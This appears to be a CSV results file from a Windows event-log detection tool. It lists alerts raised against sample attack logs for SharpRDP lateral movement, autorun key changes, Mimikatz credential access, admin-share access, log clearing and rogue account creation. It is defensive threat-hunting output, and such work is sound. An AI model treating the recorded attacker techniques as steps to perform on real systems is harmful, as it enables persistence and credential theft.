+2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe""   :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip  :  Path: C:\Windows\System32\rdpclip.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe""   :  Path: \\tsclient\c\temp\stack\a.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 06:38:17.351 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\smbservice timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,-
+2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
+2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
+2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct  :  SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-1470532092-3758209836-3742276719-1001  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-1470532092-3758209836-3742276719-1001  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1158  :  Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1158  :  Group: Group02  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group01  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
